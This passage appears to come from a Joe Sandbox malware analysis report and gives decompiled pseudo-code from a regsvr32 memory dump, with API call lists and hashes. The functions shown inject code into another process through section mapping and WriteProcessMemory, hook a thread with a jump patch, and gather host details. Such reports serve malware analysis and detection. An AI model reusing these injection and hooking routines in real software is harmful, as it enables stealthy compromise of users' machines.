                                                                                                                                                                        					_t147 = 0xf;
                                                                                                                                                                        					if(_t124 > _t147) {
                                                                                                                                                                        						do {
                                                                                                                                                                        							L12:
                                                                                                                                                                        							_t63 = _t138 + 0x41; // 0x41
                                                                                                                                                                        							 *((char*)(_t165 + _t138 - 0x40)) = _t63;
                                                                                                                                                                        							_t138 = _t138 + 1;
                                                                                                                                                                        						} while (_t138 < _t147);
                                                                                                                                                                        						L13:
                                                                                                                                                                        						lstrlenW( &_v68);
                                                                                                                                                                        						 *0x537f830 = _t155;
                                                                                                                                                                        						 *0x537f81c = _v36;
                                                                                                                                                                        						goto L17;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t147 = _t124;
                                                                                                                                                                        					if(_t147 == 0) {
                                                                                                                                                                        						goto L13;
                                                                                                                                                                        					}
                                                                                                                                                                        					goto L12;
                                                                                                                                                                        				}
                                                                                                                                                                        			}






































                                                                                                                                                                        0x0536d60c
                                                                                                                                                                        0x0536d611
                                                                                                                                                                        0x0536d616
                                                                                                                                                                        0x0536d61c
                                                                                                                                                                        0x0536d622
                                                                                                                                                                        0x0536d62a
                                                                                                                                                                        0x0536d63a
                                                                                                                                                                        0x0536d646
                                                                                                                                                                        0x0536d650
                                                                                                                                                                        0x0536d658
                                                                                                                                                                        0x0536d65d
                                                                                                                                                                        0x0536d660
                                                                                                                                                                        0x0536d668
                                                                                                                                                                        0x0536d668
                                                                                                                                                                        0x0536d668
                                                                                                                                                                        0x0536d66b
                                                                                                                                                                        0x0536d66f
                                                                                                                                                                        0x0536d670
                                                                                                                                                                        0x0536d674
                                                                                                                                                                        0x0536d678
                                                                                                                                                                        0x0536d681
                                                                                                                                                                        0x0536d687
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0536d687
                                                                                                                                                                        0x0536d662
                                                                                                                                                                        0x0536d666
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0536d666

                                                                                                                                                                        APIs
                                                                                                                                                                        • NtCreateSection.NTDLL(0536D982,0000000E,00000000,?,00000040,08000000,00000000,?), ref: 0536D4B9
                                                                                                                                                                        • RegisterClassExA.USER32(?), ref: 0536D50D
                                                                                                                                                                        • CreateWindowExA.USER32 ref: 0536D538
                                                                                                                                                                        • DestroyWindow.USER32(00000000), ref: 0536D543
                                                                                                                                                                        • UnregisterClassA.USER32 ref: 0536D54E
                                                                                                                                                                        • NtMapViewOfSection.NTDLL(0536D982,00000000), ref: 0536D579
                                                                                                                                                                        • NtMapViewOfSection.NTDLL(0536D982,00000000,00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 0536D5A0
                                                                                                                                                                        • VirtualAllocEx.KERNELBASE(00000000,00000000,00001AC4,00001000,00000004), ref: 0536D5E6
                                                                                                                                                                        • WriteProcessMemory.KERNELBASE(00000000,00000000,00000000,00001AC4,?), ref: 0536D600
                                                                                                                                                                          • Part of subcall function 05368BF4: HeapFree.KERNEL32(00000000,00000000), ref: 05368C3A
                                                                                                                                                                        • lstrlenW.KERNEL32(?,?,?,?,?,?,00000000,053661C5), ref: 0536D678
                                                                                                                                                                        • NtUnmapViewOfSection.NTDLL(00000000), ref: 0536D6C0
                                                                                                                                                                        • NtClose.NTDLL(00000000), ref: 0536D6D4
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001B.00000002.496124350.0000000005360000.00000040.00001000.00020000.00000000.sdmp, Offset: 05360000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_27_2_5360000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Section$View$ClassCreateWindow$AllocCloseDestroyFreeHeapMemoryProcessRegisterUnmapUnregisterVirtualWritelstrlen
                                                                                                                                                                        • String ID: 0$18293$aeroflot$quatr
                                                                                                                                                                        • API String ID: 494031690-2640591812
                                                                                                                                                                        • Opcode ID: 51171ef4ce001edf49c181e63098e5aed1a1b8c43c77506d4dacf7cd26d4ad0b
                                                                                                                                                                        • Instruction ID: b95ce068980fa94b0afe97d71d9a03d8dd4795820814d5ef59b6f0a93d648e0d
                                                                                                                                                                        • Opcode Fuzzy Hash: 51171ef4ce001edf49c181e63098e5aed1a1b8c43c77506d4dacf7cd26d4ad0b
                                                                                                                                                                        • Instruction Fuzzy Hash: 9A81F7B1E1021DAFDB11DF99D885EEEBBBCFB08304F144569F605AB250DB709A41CBA4
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 143 536d959-536d972 call 536d218 146 536da4b-536da56 call 536d38b 143->146 147 536d978-536d986 call 536d447 143->147 147->146 152 536d98c-536d9c3 call 5368d6d GetThreadContext 147->152 152->146 155 536d9c9-536da09 NtProtectVirtualMemory 152->155 156 536da0b-536da26 NtWriteVirtualMemory 155->156 157 536da49 155->157 156->157 158 536da28-536da47 NtProtectVirtualMemory 156->158 157->146 158->146 158->157
                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E0536D959(void* __ecx, void** __edx, void* __eflags, intOrPtr _a4) {
                                                                                                                                                                        				long _v8;
                                                                                                                                                                        				long _v12;
                                                                                                                                                                        				void* _v16;
                                                                                                                                                                        				intOrPtr _v23;
                                                                                                                                                                        				void _v24;
                                                                                                                                                                        				long _v28;
                                                                                                                                                                        				struct _CONTEXT _v744;
                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                        				void* __edi;
                                                                                                                                                                        				void* __esi;
                                                                                                                                                                        				void* _t33;
                                                                                                                                                                        				void* _t57;
                                                                                                                                                                        				long _t59;
                                                                                                                                                                        				void* _t62;
                                                                                                                                                                        				void** _t65;
                                                                                                                                                                        				void* _t66;
                                                                                                                                                                        
                                                                                                                                                                        				_t65 = __edx;
                                                                                                                                                                        				_t57 = __ecx;
                                                                                                                                                                        				_t66 = 0;
                                                                                                                                                                        				if(E0536D218(__ecx, __edx, __edx, 0) != 0) {
                                                                                                                                                                        					_t33 = E0536D447( *((intOrPtr*)(__edx)), _a4); // executed
                                                                                                                                                                        					_t66 = _t33;
                                                                                                                                                                        					if(_t66 != 0) {
                                                                                                                                                                        						E05368D6D( &_v744, 0, 0x2cc);
                                                                                                                                                                        						_v744.ContextFlags = 0x10002;
                                                                                                                                                                        						if(GetThreadContext(_t65[1],  &_v744) != 0) {
                                                                                                                                                                        							_t62 = _v744.Eax;
                                                                                                                                                                        							_v12 = _v12 & 0x00000000;
                                                                                                                                                                        							_v24 = 0xe9;
                                                                                                                                                                        							_t59 = 5;
                                                                                                                                                                        							_v23 = _t66 - _t62 - _a4 + _t57 + 0xfffffffb;
                                                                                                                                                                        							_v8 = _t59;
                                                                                                                                                                        							_v16 = _t62;
                                                                                                                                                                        							if(NtProtectVirtualMemory( *_t65,  &_v16,  &_v8, 4,  &_v12) < 0 || NtWriteVirtualMemory( *_t65, _v744.Eax,  &_v24, _t59,  &_v8) < 0) {
                                                                                                                                                                        								L6:
                                                                                                                                                                        								_t66 = 0;
                                                                                                                                                                        							} else {
                                                                                                                                                                        								_v28 = _v28 & 0x00000000;
                                                                                                                                                                        								if(NtProtectVirtualMemory( *_t65,  &_v16,  &_v8, _v12,  &_v28) < 0) {
                                                                                                                                                                        									goto L6;
                                                                                                                                                                        								}
                                                                                                                                                                        							}
                                                                                                                                                                        						}
                                                                                                                                                                        					}
                                                                                                                                                                        				}
                                                                                                                                                                        				E0536D38B();
                                                                                                                                                                        				return _t66;
                                                                                                                                                                        			}




















                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 0536D218: LoadLibraryW.KERNEL32 ref: 0536D312
                                                                                                                                                                          • Part of subcall function 0536D447: NtCreateSection.NTDLL(0536D982,0000000E,00000000,?,00000040,08000000,00000000,?), ref: 0536D4B9
                                                                                                                                                                          • Part of subcall function 0536D447: RegisterClassExA.USER32(?), ref: 0536D50D
                                                                                                                                                                          • Part of subcall function 0536D447: CreateWindowExA.USER32 ref: 0536D538
                                                                                                                                                                          • Part of subcall function 0536D447: DestroyWindow.USER32(00000000), ref: 0536D543
                                                                                                                                                                          • Part of subcall function 0536D447: UnregisterClassA.USER32 ref: 0536D54E
                                                                                                                                                                          • Part of subcall function 05368D6D: memset.MSVCRT ref: 05368D7F
                                                                                                                                                                        • GetThreadContext.KERNELBASE(?,00010002,00000000,00000000,00000000), ref: 0536D9BB
                                                                                                                                                                        • NtProtectVirtualMemory.NTDLL(?,?,?,00000004,00000000), ref: 0536DA04
                                                                                                                                                                        • NtWriteVirtualMemory.NTDLL(?,?,000000E9,00000005,?), ref: 0536DA21
                                                                                                                                                                        • NtProtectVirtualMemory.NTDLL(?,?,?,00000000,00000000), ref: 0536DA42
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001B.00000002.496124350.0000000005360000.00000040.00001000.00020000.00000000.sdmp, Offset: 05360000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_27_2_5360000_regsvr32.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: MemoryVirtual$ClassCreateProtectWindow$ContextDestroyLibraryLoadRegisterSectionThreadUnregisterWritememset
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1578692462-0
                                                                                                                                                                        • Opcode ID: 6abdf421138ac8380edc527a091178fd2c7f224300b12bde26de848c08c48e5c
                                                                                                                                                                        • Instruction ID: 04c8b453efc44c627efbc569f6e80e3874edca3fce6994bb8808fe926fab8fa6
                                                                                                                                                                        • Opcode Fuzzy Hash: 6abdf421138ac8380edc527a091178fd2c7f224300b12bde26de848c08c48e5c
                                                                                                                                                                        • Instruction Fuzzy Hash: 7F315E76B0410AAFDB11EFA4CD89FDEBBBCBF08200F1081A9E505E6154E770DA458BA0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 79%
                                                                                                                                                                        			E0536DF3D(void* __fp0) {
                                                                                                                                                                        				char _v8;
                                                                                                                                                                        				char _v12;
                                                                                                                                                                        				char _v16;
                                                                                                                                                                        				char _v144;
                                                                                                                                                                        				char _v656;
                                                                                                                                                                        				char _v668;
                                                                                                                                                                        				char _v2644;
                                                                                                                                                                        				void* __esi;
                                                                                                                                                                        				struct _OSVERSIONINFOA* _t68;
                                                                                                                                                                        				intOrPtr _t70;
                                                                                                                                                                        				void* _t71;
                                                                                                                                                                        				intOrPtr _t73;
                                                                                                                                                                        				void* _t74;
                                                                                                                                                                        				intOrPtr _t75;
                                                                                                                                                                        				intOrPtr* _t77;
                                                                                                                                                                        				intOrPtr _t79;
                                                                                                                                                                        				intOrPtr _t80;
                                                                                                                                                                        				intOrPtr _t81;
                                                                                                                                                                        				intOrPtr _t87;
                                                                                                                                                                        				int _t90;
                                                                                                                                                                        				intOrPtr _t92;
                                                                                                                                                                        				void* _t93;
                                                                                                                                                                        				void* _t97;
                                                                                                                                                                        				intOrPtr _t99;
                                                                                                                                                                        				intOrPtr _t101;
                                                                                                                                                                        				short _t106;
                                                                                                                                                                        				char _t108;
                                                                                                                                                                        				intOrPtr _t113;
                                                                                                                                                                        				intOrPtr _t116;
                                                                                                                                                                        				intOrPtr _t119;
                                                                                                                                                                        				intOrPtr _t123;
                                                                                                                                                                        				intOrPtr _t134;
                                                                                                                                                                        				intOrPtr _t136;
                                                                                                                                                                        				intOrPtr _t138;
                                                                                                                                                                        				intOrPtr _t141;
                                                                                                                                                                        				intOrPtr _t143;
                                                                                                                                                                        				intOrPtr _t148;
                                                                                                                                                                        				void* _t149;
                                                                                                                                                                        				WCHAR* _t150;
                                                                                                                                                                        				char* _t151;
                                                                                                                                                                        				intOrPtr _t162;
                                                                                                                                                                        				intOrPtr _t177;
                                                                                                                                                                        				void* _t191;
                                                                                                                                                                        				struct _OSVERSIONINFOA* _t192;
                                                                                                                                                                        				void* _t193;
                                                                                                                                                                        				void* _t195;
                                                                                                                                                                        				char _t198;
                                                                                                                                                                        				void* _t199;
                                                                                                                                                                        				char* _t200;
                                                                                                                                                                        				void* _t203;
                                                                                                                                                                        				int* _t204;
                                                                                                                                                                        				void* _t216;
                                                                                                                                                                        
                                                                                                                                                                        				_t216 = __fp0;
                                                                                                                                                                        				_t148 =  *0x537f830; // 0x5360000
                                                                                                                                                                        				_t68 = E05368BDE(0x1ac4);
                                                                                                                                                                        				_t192 = _t68;
                                                                                                                                                                        				if(_t192 != 0) {
                                                                                                                                                                        					 *((intOrPtr*)(_t192 + 0x1640)) = GetCurrentProcessId();
                                                                                                                                                                        					_t70 =  *0x537f818; // 0x546f8b0
                                                                                                                                                                        					_t71 =  *((intOrPtr*)(_t70 + 0xac))(_t193);
                                                                                                                                                                        					_t3 = _t192 + 0x648; // 0x648
                                                                                                                                                                        					E05373548( *((intOrPtr*)(_t192 + 0x1640)) + _t71, _t3);
                                                                                                                                                                        					_t73 =  *0x537f818; // 0x546f8b0
                                                                                                                                                                        					_t5 = _t192 + 0x1644; // 0x1644
                                                                                                                                                                        					_t194 = _t5;
                                                                                                                                                                        					_t74 =  *((intOrPtr*)(_t73 + 0x128))(0, _t5, 0x105);
                                                                                                                                                                        					_t207 = _t74;
                                                                                                                                                                        					if(_t74 != 0) {
                                                                                                                                                                        						 *((intOrPtr*)(_t192 + 0x1854)) = E053695F3(_t194, _t207);
                                                                                                                                                                        					}
                                                                                                                                                                        					_t75 =  *0x537f818; // 0x546f8b0
                                                                                                                                                                        					_t77 = E0536C879( *((intOrPtr*)(_t75 + 0x12c))()); // executed
                                                                                                                                                                        					 *((intOrPtr*)(_t192 + 0x110)) = _t77;
                                                                                                                                                                        					_t159 =  *_t77;
                                                                                                                                                                        					if(E0536C9F4( *_t77) == 0) {
                                                                                                                                                                        						_t79 = E0536C8C9(_t159, _t194); // executed
                                                                                                                                                                        						__eflags = _t79;
                                                                                                                                                                        						_t162 = (0 | _t79 > 0x00000000) + 1;
                                                                                                                                                                        						__eflags = _t162;
                                                                                                                                                                        						 *((intOrPtr*)(_t192 + 0x214)) = _t162;
                                                                                                                                                                        					} else {
                                                                                                                                                                        						 *((intOrPtr*)(_t192 + 0x214)) = 3;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t14 = _t192 + 0x220; // 0x220, executed
                                                                                                                                                                        					_t80 = E0536F3A3(_t14); // executed
                                                                                                                                                                        					 *((intOrPtr*)(_t192 + 0x218)) = _t80;
                                                                                                                                                                        					_t81 = E0536F368(_t14); // executed
                                                                                                                                                                        					 *((intOrPtr*)(_t192 + 0x21c)) = _t81;
                                                                                                                                                                        					_t17 = _t192 + 0x114; // 0x114
                                                                                                                                                                        					_t195 = _t17;
                                                                                                                                                                        					 *((intOrPtr*)(_t192 + 0x224)) = _t148;
                                                                                                                                                                        					_push( &_v16);
                                                                                                                                                                        					_v12 = 0x80;
                                                                                                                                                                        					_push( &_v8);
                                                                                                                                                                        					_v8 = 0x100;
                                                                                                                                                                        					_push( &_v656);
                                                                                                                                                                        					_push( &_v12);
                                                                                                                                                                        					_push(_t195);
                                                                                                                                                                        					_push( *((intOrPtr*)( *((intOrPtr*)(_t192 + 0x110)))));
                                                                                                                                                                        					_t87 =  *0x537f820; // 0x546faa0
                                                                                                                                                                        					_push(0); // executed
                                                                                                                                                                        					if( *((intOrPtr*)(_t87 + 0x6c))() == 0) {
                                                                                                                                                                        						GetLastError();
                                                                                                                                                                        					}
                                                                                                                                                                        					_t90 = GetSystemMetrics(0x1000);
                                                                                                                                                                        					_t28 = _t192 + 0x228; // 0x228
                                                                                                                                                                        					_t149 = _t28;
                                                                                                                                                                        					 *(_t192 + 0x1850) = 0 | _t90 > 0x00000000;
                                                                                                                                                                        					E0536DF36(_t149); // executed
                                                                                                                                                                        					_t211 = _t149;
                                                                                                                                                                        					if(_t149 != 0) {
                                                                                                                                                                        						 *((intOrPtr*)(_t192 + 0x434)) = E053695F3(_t149, _t211);
                                                                                                                                                                        					}
                                                                                                                                                                        					_t92 = E0536C6CE();
                                                                                                                                                                        					_t33 = _t192 + 0xb0; // 0xb0
                                                                                                                                                                        					_t196 = _t33;
                                                                                                                                                                        					 *((intOrPtr*)(_t192 + 0xac)) = _t92;
                                                                                                                                                                        					_t93 = E0536C4C1(_t92, _t33, _t211, _t216);
                                                                                                                                                                        					_t35 = _t192 + 0xd0; // 0xd0
                                                                                                                                                                        					E053699DF(_t93, _t33, _t35);
                                                                                                                                                                        					_t36 = _t192 + 0x438; // 0x438
                                                                                                                                                                        					E0536960D(_t149, _t36);
                                                                                                                                                                        					_t97 = E0536E2C5(_t196, E0536A43D(_t33), 0);
                                                                                                                                                                        					_t37 = _t192 + 0x100c; // 0x100c
                                                                                                                                                                        					E0536C6E4(_t97, _t37, _t216);
                                                                                                                                                                        					_t99 =  *0x537f818; // 0x546f8b0
                                                                                                                                                                        					_t101 = E0536CA46( *((intOrPtr*)(_t99 + 0x12c))(_t195)); // executed
                                                                                                                                                                        					 *((intOrPtr*)(_t192 + 0x101c)) = _t101;
                                                                                                                                                                        					E05368D6D(_t192, 0, 0x9c);
                                                                                                                                                                        					_t204 = _t203 + 0xc;
                                                                                                                                                                        					_t192->dwOSVersionInfoSize = 0x9c;
                                                                                                                                                                        					GetVersionExA(_t192);
                                                                                                                                                                        					 *((intOrPtr*)(_t192 + 0xa8)) = E0536DD39(_t100);
                                                                                                                                                                        					_t106 = E0536DD62(_t105);
                                                                                                                                                                        					_t41 = _t192 + 0x1020; // 0x1020
                                                                                                                                                                        					_t150 = _t41;
                                                                                                                                                                        					 *((short*)(_t192 + 0x9c)) = _t106;
                                                                                                                                                                        					GetWindowsDirectoryW(_t150, 0x104);
                                                                                                                                                                        					_t108 = E05369DF2(_t105, 0x9cf);
                                                                                                                                                                        					_t177 =  *0x537f818; // 0x546f8b0
                                                                                                                                                                        					_t198 = _t108;
                                                                                                                                                                        					 *_t204 = 0x104;
                                                                                                                                                                        					_push( &_v668);
                                                                                                                                                                        					_push(_t198);
                                                                                                                                                                        					_v8 = _t198;
                                                                                                                                                                        					if( *((intOrPtr*)(_t177 + 0xec))() == 0) {
                                                                                                                                                                        						_t143 =  *0x537f818; // 0x546f8b0
                                                                                                                                                                        						 *((intOrPtr*)(_t143 + 0x108))(_t198, _t150);
                                                                                                                                                                        					}
                                                                                                                                                                        					E05368BAF( &_v8);
                                                                                                                                                                        					_t113 =  *0x537f818; // 0x546f8b0
                                                                                                                                                                        					_t48 = _t192 + 0x1434; // 0x1434
                                                                                                                                                                        					_t199 = _t48;
                                                                                                                                                                        					 *_t204 = 0x209;
                                                                                                                                                                        					_push(_t199);
                                                                                                                                                                        					_push(L"USERPROFILE");
                                                                                                                                                                        					if( *((intOrPtr*)(_t113 + 0xec))() == 0) {
                                                                                                                                                                        						E05369E51(_t199, 0x105, L"%s\\%s", _t150);
                                                                                                                                                                        						_t141 =  *0x537f818; // 0x546f8b0
                                                                                                                                                                        						_t204 =  &(_t204[5]);
                                                                                                                                                                        						 *((intOrPtr*)(_t141 + 0x108))(L"USERPROFILE", _t199, "TEMP");
                                                                                                                                                                        					}
                                                                                                                                                                        					_push(0x20a);
                                                                                                                                                                        					_t51 = _t192 + 0x122a; // 0x122a
                                                                                                                                                                        					_t151 = L"TEMP";
                                                                                                                                                                        					_t116 =  *0x537f818; // 0x546f8b0
                                                                                                                                                                        					_push(_t151);
                                                                                                                                                                        					if( *((intOrPtr*)(_t116 + 0xec))() == 0) {
                                                                                                                                                                        						_t138 =  *0x537f818; // 0x546f8b0
                                                                                                                                                                        						 *((intOrPtr*)(_t138 + 0x108))(_t151, _t199);
                                                                                                                                                                        					}
                                                                                                                                                                        					_push(0x40);
                                                                                                                                                                        					_t200 = L"SystemDrive";
                                                                                                                                                                        					_push( &_v144);
                                                                                                                                                                        					_t119 =  *0x537f818; // 0x546f8b0
                                                                                                                                                                        					_push(_t200);
                                                                                                                                                                        					if( *((intOrPtr*)(_t119 + 0xec))() == 0) {
                                                                                                                                                                        						_t136 =  *0x537f818; // 0x546f8b0
                                                                                                                                                                        						 *((intOrPtr*)(_t136 + 0x108))(_t200, L"C:");
                                                                                                                                                                        					}
                                                                                                                                                                        					_v8 = 0x7f;
                                                                                                                                                                        					_t59 = _t192 + 0x199c; // 0x199c
                                                                                                                                                                        					_t123 =  *0x537f818; // 0x546f8b0
                                                                                                                                                                        					 *((intOrPtr*)(_t123 + 0xbc))(_t59,  &_v8);
                                                                                                                                                                        					_t62 = _t192 + 0x100c; // 0x100c
                                                                                                                                                                        					E05373548(E0536E2C5(_t62, E0536A43D(_t62), 0),  &_v2644);
                                                                                                                                                                        					_t63 = _t192 + 0x1858; // 0x1858
                                                                                                                                                                        					E0537351A( &_v2644, _t63, 0x20);
                                                                                                                                                                        					_push( &_v2644);
                                                                                                                                                                        					_push(0x1e);
                                                                                                                                                                        					_t66 = _t192 + 0x1878; // 0x1878
                                                                                                                                                                        					_t191 = 0x14;
                                                                                                                                                                        					E053696DA(_t66, _t191);
                                                                                                                                                                        					_t134 = E0536DAE3(_t191); // executed
                                                                                                                                                                        					 *((intOrPtr*)(_t192 + 0x1898)) = _t134;
                                                                                                                                                                        					return _t192;
                                                                                                                                                                        				}
                                                                                                                                                                        				return _t68;
                                                                                                                                                                        			}
                                                                                                                                                                        0x0536e212
                                                                                                                                                                        0x0536e21a
                                                                                                                                                                        0x0536e21f
                                                                                                                                                                        0x0536e220
                                                                                                                                                                        0x0536e225
                                                                                                                                                                        0x0536e22e
                                                                                                                                                                        0x0536e230
                                                                                                                                                                        0x0536e23b
                                                                                                                                                                        0x0536e23b
                                                                                                                                                                        0x0536e244
                                                                                                                                                                        0x0536e24c
                                                                                                                                                                        0x0536e253
                                                                                                                                                                        0x0536e258
                                                                                                                                                                        0x0536e267
                                                                                                                                                                        0x0536e27f
                                                                                                                                                                        0x0536e286
                                                                                                                                                                        0x0536e294
                                                                                                                                                                        0x0536e29f
                                                                                                                                                                        0x0536e2a0
                                                                                                                                                                        0x0536e2a4
                                                                                                                                                                        0x0536e2aa
                                                                                                                                                                        0x0536e2ab
                                                                                                                                                                        0x0536e2b3
                                                                                                                                                                        0x0536e2b8
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0536e2c0
                                                                                                                                                                        0x0536e2c4

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 05368BDE: RtlAllocateHeap.NTDLL(00000008,?,?,0536959D,00000100,?,05366507), ref: 05368BEC
                                                                                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 0536DF64
                                                                                                                                                                        • GetLastError.KERNEL32 ref: 0536E05E
                                                                                                                                                                        • GetSystemMetrics.USER32(00001000), ref: 0536E06E
                                                                                                                                                                        • GetVersionExA.KERNEL32(00000000), ref: 0536E123
                                                                                                                                                                          • Part of subcall function 0536C8C9: FindCloseChangeNotification.KERNELBASE(?,00001644,00000000,05360000), ref: 0536C96D
                                                                                                                                                                        • GetWindowsDirectoryW.KERNEL32(00001020,00000104), ref: 0536E14E
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001B.00000002.496124350.0000000005360000.00000040.00001000.00020000.00000000.sdmp, Offset: 05360000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_27_2_5360000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AllocateChangeCloseCurrentDirectoryErrorFindHeapLastMetricsNotificationProcessSystemVersionWindows
                                                                                                                                                                        • String ID: %s\%s$SystemDrive$TEMP$TEMP$USERPROFILE
                                                                                                                                                                        • API String ID: 3131805607-2706916422
                                                                                                                                                                        • Opcode ID: d9e08141520e5c55bdbce689e305f6e119dc64236412db1dcd2400e468c001d9
                                                                                                                                                                        • Instruction ID: 09ded651cedcf57b5bf166daf63ae764138bfff469db2841d1d0ca42874a6bb3
                                                                                                                                                                        • Opcode Fuzzy Hash: d9e08141520e5c55bdbce689e305f6e119dc64236412db1dcd2400e468c001d9
                                                                                                                                                                        • Instruction Fuzzy Hash: 2B917C71B00609AFD715EB74D849FEABBE8FF09300F00816DF519DB244DB74AA958BA1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        C-Code - Quality: 94%
                                                                                                                                                                        			E0536C5EC(WCHAR* __ecx, WCHAR* __edx) {
                                                                                                                                                                        				long _v8;
                                                                                                                                                                        				long _v12;
                                                                                                                                                                        				WCHAR* _v16;
                                                                                                                                                                        				short _v528;
                                                                                                                                                                        				short _v1040;
                                                                                                                                                                        				short _v1552;
                                                                                                                                                                        				intOrPtr _t23;
                                                                                                                                                                        				WCHAR* _t27;
                                                                                                                                                                        				signed int _t29;
                                                                                                                                                                        				void* _t33;
                                                                                                                                                                        				long _t38;
                                                                                                                                                                        				WCHAR* _t43;
                                                                                                                                                                        				WCHAR* _t56;
                                                                                                                                                                        
                                                                                                                                                                        				_t44 = __ecx;
                                                                                                                                                                        				_v8 = _v8 & 0x00000000;
                                                                                                                                                                        				_t43 = __edx;
                                                                                                                                                                        				_t56 = __ecx;
                                                                                                                                                                        				E05368D6D(__edx, 0, 0x100);
                                                                                                                                                                        				_v12 = 0x100;
                                                                                                                                                                        				_t23 =  *0x537f818; // 0x546f8b0
                                                                                                                                                                        				 *((intOrPtr*)(_t23 + 0xbc))( &_v528,  &_v12);
                                                                                                                                                                        				lstrcpynW(__edx,  &_v528, 0x100);
                                                                                                                                                                        				_t27 = E05369DF2(_t44, 0xad6);
                                                                                                                                                                        				_v16 = _t27;
                                                                                                                                                                        				_t29 = GetVolumeInformationW(_t27,  &_v1552, 0x100,  &_v8, 0, 0,  &_v1040, 0x100);
                                                                                                                                                                        				asm("sbb eax, eax");
                                                                                                                                                                        				_v8 = _v8 &  ~_t29;
                                                                                                                                                                        				E05368BAF( &_v16);
                                                                                                                                                                        				_t33 = E0536A456(_t43);
                                                                                                                                                                        				E05369E51( &(_t43[E0536A456(_t43)]), 0x100 - _t33, L"%u", _v8);
                                                                                                                                                                        				lstrcatW(_t43, _t56);
                                                                                                                                                                        				_t38 = E0536A456(_t43);
                                                                                                                                                                        				_v12 = _t38;
                                                                                                                                                                        				CharUpperBuffW(_t43, _t38);
                                                                                                                                                                        				return E0536E2C5(_t43, E0536A456(_t43) + _t40, 0);
                                                                                                                                                                        			}


                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 05368D6D: memset.MSVCRT ref: 05368D7F
                                                                                                                                                                        • lstrcpynW.KERNEL32(?,?,00000100), ref: 0536C633
                                                                                                                                                                        • GetVolumeInformationW.KERNELBASE(00000000,?,00000100,00000000,00000000,00000000,?,00000100), ref: 0536C665
                                                                                                                                                                          • Part of subcall function 05369E51: _vsnwprintf.MSVCRT ref: 05369E6E
                                                                                                                                                                        • lstrcatW.KERNEL32(?,00000114), ref: 0536C69E
                                                                                                                                                                        • CharUpperBuffW.USER32(?,00000000), ref: 0536C6B0
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001B.00000002.496124350.0000000005360000.00000040.00001000.00020000.00000000.sdmp, Offset: 05360000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_27_2_5360000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: BuffCharInformationUpperVolume_vsnwprintflstrcatlstrcpynmemset
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 455400327-0
                                                                                                                                                                        • Opcode ID: 2629e9aaa42481578834a40f5f799d8036fea33034c551c43d056e05e41b3780
                                                                                                                                                                        • Instruction ID: 66e4fb63f5f7bbca40ce99d1bac8451fbe65d1b00b40a521ae694017e16ee024
                                                                                                                                                                        • Opcode Fuzzy Hash: 2629e9aaa42481578834a40f5f799d8036fea33034c551c43d056e05e41b3780
                                                                                                                                                                        • Instruction Fuzzy Hash: 102144B3E10218BFD710ABA4DC4EFEE7BBDEB44310F108569F505E6184EE749A448B60
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        C-Code - Quality: 82%
                                                                                                                                                                        			E0536B96A(void* __ecx, void* __edx) {
                                                                                                                                                                        				void* _v304;
                                                                                                                                                                        				void* _v308;
                                                                                                                                                                        				intOrPtr _v312;
                                                                                                                                                                        				signed int _t16;
                                                                                                                                                                        				signed int _t17;
                                                                                                                                                                        				intOrPtr _t30;
                                                                                                                                                                        				void* _t33;
                                                                                                                                                                        				void* _t43;
                                                                                                                                                                        				void* _t45;
                                                                                                                                                                        
                                                                                                                                                                        				_t33 = __edx;
                                                                                                                                                                        				_v304 = __ecx;
                                                                                                                                                                        				_t16 = CreateToolhelp32Snapshot(2, 0);
                                                                                                                                                                        				_t45 = _t16;
                                                                                                                                                                        				_t17 = _t16 | 0xffffffff;
                                                                                                                                                                        				if(_t45 != _t17) {
                                                                                                                                                                        					E05368D6D( &_v304, 0, 0x128);
                                                                                                                                                                        					_v304 = 0x128;
                                                                                                                                                                        					if(Process32First(_t45,  &_v304) != 0) {
                                                                                                                                                                        						do {
                                                                                                                                                                        							_t43 = _v312( &_v308, _t33);
